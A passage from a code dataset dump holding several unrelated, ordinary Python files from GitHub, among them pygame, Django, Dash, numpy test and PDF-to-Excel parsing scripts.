mocked conv2d operation.\n \"\"\"\n conv = partial(hxtorch.perceptron.conv2d, mock=True)\n\n @classmethod\n def setUpClass(cls):\n mock_parameter = hxtorch.perceptron.MockParameter()\n hxtorch.perceptron.set_mock_parameter(mock_parameter)\n cls.gain = mock_parameter.gain\n\n\ndel TestConv # remove abstract base class from tests\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"electronicvisions/hxtorch","sub_path":"tests/hw/test_perceptron_conv.py","file_name":"test_perceptron_conv.py","file_ext":"py","file_size_in_byte":9746,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"27"} +{"seq_id":"32499717048","text":"__author__ = 'halley'\nimport random\nfrom constants import *\nimport music21helpers as mh\n\n#pick a chord progression that fits the given last chord\ndef chooseChords(num_chords, first_chord = [0,2,4], end_chords = [[0,2,4]]):\n chords = [first_chord]\n for i in range(1, num_chords - len(end_chords) - 1):\n next_chord = random.choice(chord_movements[chords[-1][0]])\n chords.append([next_chord + j for j in [0,2,4]])\n penultimate_chord_choices = chord_movements[chords[-1][0]]\n penultimate_chord_choices = filter(lambda i: end_chords[0][0] in chord_movements[i], penultimate_chord_choices)\n penultimate_choice = random.choice(penultimate_chord_choices)\n chords.append([penultimate_choice + j for j in [0,2,4]])\n chords.extend(end_chords)\n return chords\n\n\nchords = chooseChords(num_chords = 8, end_chords = [[4,6,8],[0,2,4]])\nprint(chords)\npits = [tuple(i) for i in chords]\ndurs = [2.0 for i in chords]\n\npart = mh.listsDegreesToPart(pits, durs)\n\npart.show()","repo_name":"HalleyYoung/AlgorithmicMusic-Latest","sub_path":"chordchoices.py","file_name":"chordchoices.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"41595928019","text":"from .utils import *\n\n\nclass Window:\n def __init__(self, screen, titre=\"\", version=1.0, pos=(0, 0), size=(0, 0), couleur=(20, 20, 20),\n contour_couleur=BLACK, couleur_barre=GREY, movable=True, fullscreen=False,\n cote_c=EPAISSEUR_BARRE // 2):\n self.screen = screen\n self.movable = movable\n self.fullscreen = fullscreen\n self.couleur_barre = couleur_barre\n self.wscreen, self.hscreen = self.screen.get_size()\n self.titre = titre\n self.version = version\n self.fen_name = \"[\" + self.titre + \"]\" + \" \" + str(self.version)\n self.pos = Point(*pos)\n self.size = Point(*size)\n self.couleur = couleur\n self.cote_c = cote_c\n self.state = WStates.ACTIVE\n self.escape_btn = (\n self.size.x - (EPAISSEUR_BARRE - self.cote_c) // 2 - self.cote_c,\n (EPAISSEUR_BARRE - self.cote_c) // 2,\n self.cote_c,\n self.cote_c\n )\n self._content = pygame.Surface(tuple(self.size))\n self.clic_on_barre = False\n\n self._contour = pygame.Surface((self.size.x + 4, self.size.y + 4 + EPAISSEUR_BARRE))\n pygame.draw.rect(self._contour, contour_couleur, (0, 0) + self._contour.get_size())\n\n self.id = None\n\n self._blurw = pygame.Surface(tuple(self.size))\n self._blurw.fill(WHITE)\n self._blurw.convert_alpha()\n self._blurw.set_alpha(225)\n\n self.widgets = []\n\n def update_user(self):\n pass\n\n def update(self):\n for wid in self.widgets:\n wid.update()\n self.update_user()\n\n def draw_vitals(self):\n # contour\n self.screen.blit(self._contour, (self.pos.x - 2, self.pos.y - 2))\n # barre\n pygame.draw.rect(self.screen, self.couleur_barre, tuple(self.pos) + (self.size.x, EPAISSEUR_BARRE))\n # titre\n self.screen.blit(font.render(self.fen_name, 1, BLACK), (self.pos.x + 2, self.pos.y + 2))\n # croix\n pygame.draw.rect(self.screen, RED, (self.escape_btn[0] + self.pos.x, self.escape_btn[1] + self.pos.y) + self.escape_btn[2:])\n\n def draw_content(self):\n # fond\n pygame.draw.rect(self._content, self.couleur, (0, 0) + tuple(self.size))\n\n def draw(self):\n if self.alive():\n if not self.fullscreen:\n self.draw_vitals()\n self.draw_content()\n for wid in self.widgets:\n wid.draw()\n if self.state == WStates.NOT_RESPONDING:\n self._content.blit(self._blurw, (0, 0))\n self.screen.blit(self._content, (self.pos.x, self.pos.y + EPAISSEUR_BARRE if not self.fullscreen else self.pos.y))\n\n def set_alive(self, value=WStates.ACTIVE):\n self.state = value\n\n def alive(self):\n return self.state != WStates.UNACTIVE\n\n def get_title(self):\n return self.fen_name\n\n def move(self, xd, yd):\n self.pos = Point(self.pos.x + xd, self.pos.y + yd)\n self.escape_btn = (\n self.size.x - (EPAISSEUR_BARRE - self.cote_c) // 2 - self.cote_c,\n (EPAISSEUR_BARRE - self.cote_c) // 2,\n self.cote_c,\n self.cote_c\n )\n\n def trigger_vitals(self, event):\n if event.type == MOUSEBUTTONDOWN:\n x, y = event.pos\n if 0 <= x <= self.size.x and 0 <= y <= EPAISSEUR_BARRE:\n self.clic_on_barre = True\n if event.type == MOUSEMOTION:\n if self.clic_on_barre:\n if self.movable:\n x, y = event.rel\n self.move(x, y)\n if event.type == MOUSEBUTTONUP:\n self.clic_on_barre = False\n x, y = event.pos\n if not self.fullscreen and self.escape_btn[0] <= x <= self.escape_btn[0] + self.escape_btn[2] \\\n and self.escape_btn[1] <= y <= self.escape_btn[1] + self.escape_btn[3]:\n self.state = WStates.UNACTIVE\n\n def trigger_user(self, event):\n pass\n\n def trigger(self, event):\n self.trigger_vitals(event)\n self.trigger_user(event)\n if event.type in (MOUSEBUTTONUP, MOUSEMOTION, MOUSEBUTTONDOWN):\n event.pos = (event.pos[0], event.pos[1] - EPAISSEUR_BARRE)\n for wid in self.widgets:\n wid.trigger(event)\n","repo_name":"BunkerOS/OS","sub_path":"system/window.py","file_name":"window.py","file_ext":"py","file_size_in_byte":4308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"28031212870","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\nletters = 'abcdefghijklmnopqrstuvwxyz'\nletter_pos = { letters[i]: i for i in range(len(letters)) }\n\n# Complete the designerPdfViewer function below.\ndef designerPdfViewer(h, word):\n \n print(letter_pos)\n max_height = h[letter_pos[word[0]]]\n for ind in range(1, len(word)):\n cur_letter = word[ind]\n cur_height = h[letter_pos[cur_letter]]\n if cur_height > max_height:\n max_height = cur_height\n \n return len(word)*max_height\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n h = list(map(int, input().rstrip().split()))\n\n word = input()\n\n result = designerPdfViewer(h, word)\n\n fptr.write(str(result) + '\\n')\n\n fptr.close()\n\n","repo_name":"ekukura/hackkerrank","sub_path":"_algorithms/implementation/designer-pdf-viewer.py","file_name":"designer-pdf-viewer.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"18313985907","text":"import numpy as np\nimport pytest\nimport random\nimport math\n\nfrom random_projection import projection_between, random_projection\n\n\ndef random_vector(sign: int = 1, dim=0, num_dims=1000):\n vect = np.random.random_sample(size=num_dims) - 0.5\n vect /= np.linalg.norm(vect)\n vect[dim] *= sign\n return vect\n\n\ndef assert_projection_bisects(projection, vect1, vect2):\n dot1 = np.dot(vect1, projection)\n dot2 = np.dot(vect2, projection)\n if dot1 > 0:\n assert dot2 < 0\n elif dot1 < 0:\n assert dot2 > 0\n else:\n assert False, \"Both cant be 0\"\n\n\ndef vect_radians_from(vect1, vect2):\n # cross_prod = np.cross(vect1, vect2)\n # angle = np.arctan2(cross_prod, np.dot(vect1, vect2))\n angle = np.arccos(np.dot(vect1, vect2))\n return angle\n # import pdb; pdb.set_trace()\n # return np.arccos(dotted)\n\n\ndef test_random_projections_theta_uniform_dist():\n # np.random.seed(0)\n print()\n hist_size = 30\n hist_angle = np.zeros(hist_size)\n hist_dot = np.zeros(hist_size)\n for i in range(0, 1000):\n vect1 = random_vector(sign=1, num_dims=3)\n vect2 = random_vector(sign=1, num_dims=3)\n\n query_vect = random_projection(vect1, vect2, 0)\n vect = random_projection(vect1, vect2, 0)\n radians = vect_radians_from(query_vect, vect)\n bucket_angle = (radians / math.pi) * hist_size\n assert radians <= math.pi\n bucket_dot = ((np.dot(vect1, vect2) + 1) / 2) * hist_size\n hist_angle[int(bucket_angle)] += 1\n hist_dot[int(bucket_dot)] += 1\n print(\"Dot product distribution\")\n for row in hist_dot:\n if int(row) == 0:\n print(\"0\")\n else:\n print(\"+\", end=\"\")\n print(\"*\" * int(row))\n print(\"---------------\")\n print(\"Angle distribution\")\n for row in hist_angle:\n if int(row) == 0:\n print(\"0\")\n else:\n print(\"+\", end=\"\")\n print(\"*\" * int(row))\n\n\ndef test_projection_between_has_negatives():\n np.random.seed(0)\n vect1 = random_vector(sign=1)\n vect2 = random_vector(sign=1)\n projection = projection_between(vect1, vect2)\n negs = projection[projection < 0]\n assert len(negs) > 400 # seed dependent\n\n\ndef test_projection_random_positive():\n for i in range(0, 100):\n vect1 = random_vector(sign=1)\n vect2 = random_vector(sign=1)\n projection = projection_between(vect1, vect2)\n assert_projection_bisects(projection, vect1, vect2)\n\n\ndef test_projection_random_negative():\n for i in range(0, 100):\n vect1 = random_vector(sign=-1)\n vect2 = random_vector(sign=-1)\n projection = projection_between(vect1, vect2)\n assert_projection_bisects(projection, vect1, vect2)\n\n\ndef test_projection_random_pos_neg():\n for i in range(0, 100):\n vect1 = random_vector(sign=1)\n vect2 = random_vector(sign=-1)\n projection = projection_between(vect1, vect2)\n assert_projection_bisects(projection, vect1, vect2)\n\n\ndef test_projection_random_neg_pos():\n for i in range(0, 100):\n vect1 = random_vector(sign=-1)\n vect2 = random_vector(sign=1)\n projection = projection_between(vect1, vect2)\n assert_projection_bisects(projection, vect1, vect2)\n\n\ndef test_projection_zeros_dim():\n vect1 = random_vector(sign=0)\n vect2 = random_vector(sign=1)\n with pytest.raises(ValueError):\n vect1 = random_vector(sign=0)\n vect2 = random_vector(sign=1)\n projection_between(vect1, vect2)\n\n with pytest.raises(ValueError):\n vect1 = random_vector(sign=1)\n vect2 = random_vector(sign=0)\n projection_between(vect1, vect2)\n\n\ndef test_projection_specify_dim():\n vect1 = random_vector(sign=1, dim=5)\n vect2 = random_vector(sign=-1, dim=5)\n projection = projection_between(vect1, vect2, dim=5)\n assert_projection_bisects(projection, vect1, vect2)\n\n\ndef test_projection_random_specify_dim():\n for i in range(0, 100):\n vect1 = random_vector(sign=1, dim=5)\n vect2 = random_vector(sign=1, dim=5)\n projection = projection_between(vect1, vect2, dim=5)\n assert_projection_bisects(projection, vect1, vect2)\n\n\ndef test_bad_case_due_to_not_using_custom_dims_correctly():\n random.seed(0)\n np.random.seed(0)\n\n vect1 = np.array([0.1487126, 0.683811, 0.27932906, -0.65746662])\n vect2 = np.array([0.55509923, 0.0941192, 0.68748675, 0.45865933])\n dim = 2\n projection = projection_between(vect1, vect2, dim=dim)\n assert_projection_bisects(projection, vect1, vect2)\n\n\ndef test_bad_case_due_to_identical_vectors():\n vect1 = np.array([0.58090311, 0.08887496, 0.76123888, -0.27416818])\n vect2 = np.array([0.58090311, 0.08887496, 0.76123888, -0.27416818])\n dim = 0\n with pytest.raises(ValueError):\n projection_between(vect1, vect2, dim=dim)\n","repo_name":"softwaredoug/passages","sub_path":"tests/test_random_projection.py","file_name":"test_random_projection.py","file_ext":"py","file_size_in_byte":4854,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"27"} +{"seq_id":"38964101858","text":"from django.db import models\nfrom django.contrib.auth.models import User\n\n# Create your models here.\nclass Post(models.Model):\n # for Post Table in db\n user=models.ForeignKey(User,on_delete=models.CASCADE) #user who posts th Post\n caption= models.CharField(max_length=200)\n image = models.ImageField(upload_to=\"Posts\")\n date=models.DateTimeField(auto_now_add=True)\n\n def __str__(self):\n return str(self.user)+\" \"+str(self.date)\n\nclass Profile(models.Model):\n # for Profile Table for profile pages in db\n user=models.ForeignKey(User,on_delete=models.CASCADE) #user who created the profile\n displayPicture=models.ImageField(upload_to=\"Profiles\", default=\"default/default-user-icon.jpg\")\n bio=models.CharField(max_length=200, blank=True)\n followers=models.IntegerField(default=0)\n following=models.IntegerField(default=0)\n\n def __str__(self):\n return str(self.user)\n\nclass Like(models.Model):\n user = models.ManyToManyField(User, related_name=\"liking_user\")\n post = models.OneToOneField(Post, on_delete=models.CASCADE) # class methods are much like static methods , can be accessed by class name as well as object name \n #the class method is always attached to a class with first argument as the class itself cls.\n\n # for liking post\n @classmethod\n def like(cls, post, likingUser):\n #instead of self we use cls\n obj, create = cls.objects.get_or_create(post = post)\n obj.user.add(likingUser)\n\n # for disliking post\n @classmethod\n def dislike(cls, post, dislikingUser):\n obj, create = cls.objects.get_or_create(post = post) # if an object exists returns(object,false), else creates an object and returns (object,True)\n \n obj.user.remove(dislikingUser)\n\n def __str__(self):\n return str(self.post)\n\n\n","repo_name":"Varshney200/WebSocial","sub_path":"userfeed/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"24622240431","text":"\nimport re\nfrom logging import getLogger\n\n'''\nThe model is intended to be, as far as reasonable, self-describing.\nIn other words, clients are expected to be able to display the model even if the order of the data changes,\nor if entries are added or removed.\nExceptions to the above should be keyed on tag attributes (see below).\nThe 'low-level' details (eg attribute names) of the model should not change.\n\nThe model is hierarchical, modelled as a tree.\nSo the outermost list is the 'root' and each entry is a 'node'.\nNon-leaf nodes, including the root, are lists.\nLeaf nodes are dicts / maps and represent individual 'values'.\n\nWithin a non-leaf node, the first child node is a 'text' type node (see below) that acts as a 'title' \ndescribing the contents of the node.\n\nAll leaf nodes have a 'type' attribute which describes the type of the node.\nThe contents of a node of a given type match the constructor functions below.\nAll leaf nodes have a 'value' attribute.\nAll leaf nodes have a 'tag' attribute that is intended as a machine-readable semantic marker (so where the client \nneeds exceptional processing I will try to maintain these even if the text of a node changes, for example).\n'''\n\n\nCOMPARE_LINKS = 'compare-links'\n\n# diary and general\nDB = 'db'\nDP = 'dp'\nEDIT = 'edit'\nFLOAT = 'float'\nHI = 'hi'\nIMAGE = 'image'\nINTEGER = 'integer'\nLABEL = 'label'\nLINK = 'link'\nLO = 'lo'\nMAP = 'map'\nMEASURES = 'measures'\nTAG = 'tag'\nSCHEDULES = 'schedules'\nSCORE = 'score'\nTEXT = 'text'\nTYPE = 'type'\nUNITS = 'units'\nVALUE = 'value'\n\n\nlog = getLogger(__name__)\n\n\ndef from_field(topic_field, statistic_journal):\n kargs = dict(topic_field.model)\n type = kargs[TYPE]\n del kargs[TYPE]\n kargs.update(value=statistic_journal.value,\n label=statistic_journal.statistic_name.title,\n db=statistic_journal)\n if statistic_journal.statistic_name.units:\n kargs.update(units=statistic_journal.statistic_name.units)\n return {SCORE: score, INTEGER: integer, FLOAT: float, EDIT: edit}[type](**kargs)\n\n\ndef to_tag(text):\n text = re.sub(r'\\W+', '-', text)\n text = re.sub(r'-?(\\w+(:?-\\w+)*)-?', r'\\1', text)\n return text.lower()\n\n\n# --- mutable types\n\ndef score(label, value, db=None):\n if db is None: log.warning(f'No db for score {label}/{value}')\n return {TYPE: SCORE, LABEL: label, VALUE: value, DB: db}\n\n\ndef integer(label, value, units=None, lo=None, hi=None, db=None):\n if db is None: log.warning(f'No db for integer {label}/{value}')\n return {TYPE: INTEGER, LABEL: label, VALUE: value, UNITS: units, LO: lo, HI: hi, DB: db}\n\n\ndef float(label, value, units=None, lo=None, hi=None, dp=1, db=None):\n if db is None: log.warning(f'No db for float {label}/{value}')\n return {TYPE: FLOAT, LABEL: label, VALUE: value, UNITS: units, LO: lo, HI: hi, DP: dp, DB: db}\n\n\ndef edit(label, value, db=None):\n if db is None: log.warning(f'No db for edit {label}/{value}')\n return {TYPE: EDIT, LABEL: label, VALUE: value, DB: db}\n\n\n# --- immutable types\n\ndef text(value, tag=None, db=None):\n text = {TYPE: TEXT, VALUE: value, TAG: to_tag(tag or value)}\n if db: text[DB] = db\n return text\n\n\ndef value(label, value, tag=None, units=None, measures=None):\n return {TYPE: VALUE, LABEL: label, VALUE: value, TAG: to_tag(tag or label), UNITS: units, MEASURES: measures}\n\n\ndef measures(schedules):\n # schedules are a map from schedule to (percent, rank) tuples\n return {TYPE: MEASURES, SCHEDULES: schedules}\n\n\ndef link(value, db=None, tag=None):\n if not isinstance(db, tuple): log.warning(f'Bad db for link {value}')\n return {TYPE: LINK, VALUE: value, TAG: to_tag(tag or value), DB: db}\n\n\ndef image(value, tag=None):\n return {TYPE: IMAGE, VALUE: value, TAG: to_tag(tag or value)}\n\n\ndef map(xloyloxhiyhi, db):\n return {TYPE: MAP, VALUE: xloyloxhiyhi, DB: db}\n\n\n# --- decorators\n\ndef optional_text(name, tag=None):\n def decorator(f):\n def decorated(*args, **kargs):\n first = True\n for value in f(*args, **kargs):\n if first:\n yield text(name, tag=tag)\n first = False\n yield value\n return decorated\n return decorator\n\n\ndef trim_no_stats(f):\n\n def decorated(*args, **kargs):\n result = list(f(*args, **kargs))\n\n def trim(model):\n if isinstance(model, list):\n head, rest = model[0:1], model[1:]\n rest = [x for x in [trim(entry) for entry in rest] if x]\n if rest:\n return head + rest\n else:\n return []\n else:\n return model\n return trim(result)\n\n return decorated\n","repo_name":"andrewcooke/choochoo","sub_path":"py/ch2/diary/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4705,"program_lang":"python","lang":"en","doc_type":"code","stars":234,"dataset":"github-code","pt":"27"} +{"seq_id":"34394507499","text":"# pip install pdfminer.six\nfrom pdfminer.high_level import extract_text,extract_pages\nfrom pdfminer.layout import LTTextContainer\nimport os\nimport locale\nfrom openpyxl import load_workbook, Workbook\nfrom openpyxl.utils import get_column_letter\n\n# colocar o nome da empresa e cnpj para salvar txt ou excel\n# criar funcao para salvar o txt ou excel\n\n\n\nPASTA = 'rendimentos'\nPLAN = 'planilhas'\n\n\ndef autosize(ws):\n for i in range(1, ws.max_column+1):\n ws.column_dimensions[get_column_letter(i)].bestFit = True\n\n\ndef formata_numero(ws, intervalo):\n columns = ws[intervalo]\n\n for rows in columns:\n for cell in rows:\n cell.number_format = '#,##0.00'\n\n\ndef criar_plan(nome_arquivo):\n wb = Workbook()\n wb.save('planilhas' + os.sep + nome_arquivo)\n\n\ndef salvar_dados_plan(nome_arquivo, lista):\n wb = load_workbook('planilhas' + os.sep + nome_arquivo)\n ws = wb.active\n ws.title = 'Rendimentos'\n ws.append(['NONE', 'CPF', 'RENDIMENTOS'])\n for li in lista:\n \n ws.append(li)\n\n formata_numero(ws, 'C1:D10000')\n # formata_numero(ws, 'W:Z')\n \n ws.column_dimensions['A'].width = 30\n ws.column_dimensions['B'].width = 15\n ws.column_dimensions['C'].width = 15\n \n\n wb.save('planilhas' + os.sep + nome_arquivo)\n\n\n\nclass Funcionario:\n def __init__(self):\n self.nome = ''\n self.CPF = ''\n self.rendimentos = 0.0\n \n def add_nome(self, nome):\n self.nome = nome.replace('\\n', '')\n\n def add_CPF(self, CPF):\n self.CPF = CPF.replace('\\n', '')\n\n def add_rendimentos(self, rendimentos):\n self.rendimentos = rendimentos.replace('\\n', '')\n\n\ndef compara_textos(texto_previo, texto_arquivo, excecao=False):\n \n if texto_previo.upper() == texto_arquivo.replace('\\n', '').upper():\n return True\n\n\n return False\n\n\ndef remover_txt():\n for txt in os.listdir(PASTA):\n nome, extensao = os.path.splitext(txt)\n \n if extensao == '.txt':\n os.remove(PASTA + os.sep + txt)\n\nachou_nome = False\n\ndef gerar_rendimentos_funcionarios():\n\n for rendimento in os.listdir(PASTA):\n achou_nome = False\n # # Imprimir todo o texto contido em um PDF\n nome, extensao = os.path.splitext(rendimento)\n \n if extensao == '.pdf':\n caminho_pdf = PASTA + os.sep + rendimento\n text = extract_text(caminho_pdf)\n # print(text)\n # if 'Mexico' in text:\n # print('Estamos no PDF historias.pdf')\n\n # # Salvar texto do PDF para um arquivo de texto\n arquivo_texto = PASTA + os.sep + rendimento.replace('.pdf', '.txt')\n with open(arquivo_texto,'w') as file:\n file.write(text)\n\n with open(arquivo_texto, 'r') as arquivo:\n lista = arquivo.readlines()\n # print(lista)\n # registros = [registro for registro in lista if registro.replace('\\n', '').upper() == 'Nome completo'.upper()]\n linha = 0\n lista_funcionarios = []\n # for registro in lista:\n funcionario = False\n for i in range(len(lista)):\n if compara_textos('nome empresarial', lista[i]) and not achou_nome:\n nome_arquivo = lista[i + 1].replace('\\n','')\n nome_arquivo = nome_arquivo + '.xlsx'\n achou_nome = True\n if compara_textos('comprovante de rendimentos pagos e de', lista[i]):\n # print(lista[i])\n novo_funcionario = Funcionario()\n funcionario = True\n linha += 1\n if funcionario:\n if compara_textos('nome completo', lista[i]):\n novo_funcionario.add_nome(lista[i + 1])\n if compara_textos('CPF', lista[i]):\n novo_funcionario.add_CPF(lista[i + 5])\n if compara_textos('valores em reais', lista[i]):\n if lista[i + 1] != '\\n':\n novo_funcionario.add_rendimentos(lista[i + 1])\n \n else:\n novo_funcionario.add_rendimentos(lista[i + 2])\n\n lista_funcionarios.append(novo_funcionario)\n funcionario = False\n \n lista_informacoes = []\n for funcionario in lista_funcionarios:\n\n valor_em_reais = float(funcionario.rendimentos.replace('.', '').replace(',','.'))\n if valor_em_reais > 28559.70:\n lista_informacoes.append([funcionario.nome, funcionario.CPF, valor_em_reais])\n # print(f'{funcionario.nome} | {funcionario.CPF} | {funcionario.rendimentos}')\n\n\n criar_plan(nome_arquivo)\n salvar_dados_plan(nome_arquivo, lista_informacoes)\n\n \n\nif __name__ == '__main__':\n try:\n os.mkdir('planilhas')\n except:\n for arquivo in os.listdir('planilhas'):\n os.remove('planilhas' + os.sep + arquivo)\n\n gerar_rendimentos_funcionarios()\n remover_txt()\n\n print('finalizado com sucesso')\n os.system('pause')","repo_name":"diogoheck/ler_pdf_rendimentos_IR","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5209,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"23083748728","text":"from django.shortcuts import render, redirect\nfrom content.models import ContentModel, Comment\nfrom user.models import UserModel\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponse\nimport ast\nimport requests\nimport json\n\n\n\n# Create your views here.\n\ndef home(request):\n user = request.user.is_authenticated\n #HOEM이라는 함수를 실행시키는 것 만으로도 사용자가 로그인 되어있는지 안되있는지 알 수있음\n if user: #이 사용자가 있으면\n return redirect('/main')\n else:\n return redirect('/sign-in')\n\n\ndef main(request): #get 방식만\n if request.method =='GET':\n user = request.user.is_authenticated\n if user:\n all_content = ContentModel.objects.all()\n return render(request, 'main/main.html', {'contents':all_content})\n else:\n return redirect('/sign-in')\n\n\n@login_required()\ndef content_view(request, pk): # = urls.py\n content = ContentModel.objects.get(pk=pk)\n user = UserModel.objects.get(username=request.user)\n similar_list = []\n for similar in content.get_video_similar():\n similar_content = ContentModel.objects.filter(videoURL=f'https://www.youtube.com/embed/{similar}')\n similar_list.extend(list(similar_content))\n content.video_similar = similar_list\n\n\n all_comment = Comment.objects.filter(content=content).order_by('-created_at') # 여기 중요\n wish_list = user.wishList\n if content in wish_list.all():\n is_wished = True\n else:\n is_wished = False\n\n comment_list = []\n for comment in all_comment:\n is_like = comment.likes.filter(id=request.user.id).exists()\n comment_data = (comment, is_like)\n comment_list.append(comment_data) # [(comment, is_like), (comment, is_like)....].......\n return render(request, 'main/content.html', {\"content\": content, \"comments\": all_comment, \"is_wished\": is_wished,\n \"comment_list\": comment_list}) # \"is_like\": is_like \"comments\"딕셔와 content.html에 for문 일치\n\n\n\n@login_required()\ndef write_comment(request, pk):\n if request.method == 'POST':\n comment = request.POST.get('comment_box', '')\n current_content = ContentModel.objects.get(pk=pk)\n\n ContentCommnet = Comment()\n ContentCommnet.user = request.user\n ContentCommnet.description = comment\n ContentCommnet.content = current_content\n ContentCommnet.save()\n\n return redirect('/content/' + str(pk))\n\n@login_required()\ndef delete_comment(request, pk):\n comment = Comment.objects.get(pk=pk)\n current_content = comment.content.id\n comment.delete()\n\n return redirect('/content/' + str(current_content))\n\n@login_required()\ndef like(request, comment_pk, content_pk):\n if request.method =='POST':\n ContentModel.objects.get(pk=content_pk) # ?????....\n comment = Comment.objects.get(pk=comment_pk)\n print(comment.likes.filter(username=request.user))\n if comment.likes.filter(username=request.user).exists():\n comment.likes.remove(request.user)\n comment.like_count -= 1\n comment.save()\n else:\n comment.likes.add(request.user)\n comment.like_count += 1\n comment.save()\n\n return redirect('/content/'+ str(content_pk))\n","repo_name":"Paige1996/Honflix","sub_path":"content/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3391,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"22223123578","text":"import random\nimport os\n\ninit_str = '''\n \\ | /\n- RT - Thread Operating System\n / | \\ 3.1.1 build Nov 19 2018\n 2006 - 2018 Copyright by rt-thread team\nmsh >\n'''\n\nfilename = str(input(\"请输入需要操作的文件:\"))\n\nfilesize = 0\nif (os.path.exists(filename)):\n filesize = os.path.getsize(filename)\nif (filesize == 0):\n fd = open(filename, 'a')\n fd.write(init_str)\n fd.close()\nelse :\n fd = open(filename)\n # read log content\n print(\"read log content:\")\n print(fd.read())\n fd.close()\n\nfd = open(filename, 'a')\n# write random log\nfor i in range(random.randint(0, 100)):\n fd.write(\"[task] adapter volt:\" + str(random.randint(0, 100)) + '.' + str(random.randint(0, 10)) + 'v')\n fd.write(\"\\n\")\nfd.close()","repo_name":"i-jaffer/log_prase_system","sub_path":"log_generate.py","file_name":"log_generate.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"40604673674","text":"list = input().split()\n\nd = {}\nfor s in list:\n\n if s in d:\n d[s] += 1\n else:\n d[s] = 1\n\nflg = False\nfor v in d.values():\n\n if v == 3 or v == 2:\n continue\n\n flg = True\n print(\"No\")\n break\n\nif flg is False:\n print(\"Yes\")\n","repo_name":"S-guchi/at-coder","sub_path":"abc263/a/answer.py","file_name":"answer.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"243727986","text":"class Solution(object):\n def maximumProduct(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n nums.sort()\n\n return max(nums[-1]*nums[-2]*nums[-3],nums[-1]*nums[0]*nums[1])\n\nclass Solution(object):\n def maximumProduct(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n min1 = float('inf')\n min2 = float('inf')\n max1 = float('-inf')\n max2 = float('-inf')\n max3 = float('-inf')\n for n in nums:\n if n <= min1:\n min2 = min1\n min1 = n\n elif n <= min2: # n lies between min1 and min2\n min2 = n\n if n >= max1: # n is greater than max1, max2 and max3\n max3 = max2\n max2 = max1\n max1 = n\n elif n >= max2: # n lies betweeen max1 and max2\n max3 = max2;\n max2 = n\n elif n >= max3: # n lies betwen max2 and max3\n max3 = n\n\n\n return max(min1 * min2 * max1, max1 * max2 * max3)\n \n","repo_name":"lizyang95/leetcode","sub_path":"leetcode2/maximumProduct.py","file_name":"maximumProduct.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"36900312333","text":"import dash\nfrom dash import dcc\nfrom dash import html\nimport pandas as pd\n\nchoices=['Comparison of Models',\n'Final Model Metrics',\n'ROC-AUC',\n'Confusion Matrix',\n'Feature Importance']\n\ntab_3_layout = html.Div([\n html.H3('Model Evaluation Statistics'),\n html.Div([\n html.Div([\n html.Br(),\n html.Br(),\n dcc.RadioItems(\n id='page-2-radios',\n options=[{'label': i, 'value': i} for i in choices],\n value='Comparison of Models'\n ),\n ],className='three columns'),\n html.Div([\n dcc.Graph(id='page-2-graphic')\n ],className='nine columns',style = {'width': '100%', 'display': 'flex', 'align-items': 'center', 'justify-content': 'center'}),\n ], className=' twelve columns')\n\n\n\n\n])\n","repo_name":"piushvaish/instagram-growth-tool","sub_path":"notebooks/dash-app/tabs/tab_3.py","file_name":"tab_3.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"15942976947","text":"\"\"\"\n13-1. Stars\nFind an image of a star. Make a grid of stars appear on the screen.\n\"\"\"\nimport sys\nimport pygame\nfrom pygame.sprite import Sprite\n\nclass Star(Sprite):\n \"\"\"A class to represent a single star.\"\"\"\n\n def __init__(self, screen):\n \"\"\"Initialize the star and set its starting position.\"\"\"\n super().__init__()\n self.screen = screen\n\n # Load the star image and set its rect attribute.\n self.image = pygame.image.load('star.bmp')\n self.rect = self.image.get_rect()\n\n # Create each new star near the top left of the screen.\n self.rect.x = self.rect.width\n self.rect.y = self.rect.height\n\n # Store the star's exact horizontal position.\n self.x = float(self.rect.x)\n\n# Initialize attributes\npygame.init()\nbg_color = (10, 10, 20)\nscreen_width = 1375\nscreen_height = 750\nsurface = pygame.display.set_mode((screen_width, screen_height))\npygame.display.set_caption(\"13-1 - Stars\")\nsurface.fill(bg_color)\nstars = pygame.sprite.Group()\n\n# Create a star and find the number of stars in a row.\n# Spacing between each star is equal to one star width.\nstar = Star(surface)\nstar_width, star_height = star.rect.size\navailable_space_x = screen_width - (2 * star_width)\nnumber_stars_x = (available_space_x // (2 * star_width)) + 1\n\n# Determine the number of rows of stars that fit on the screen.\navailable_space_y = (screen_height - (2 * star_height))\nnumber_rows = (available_space_y // (2 * star_height)) + 1\n\n# Create the fleet of stars.\nfor row_number in 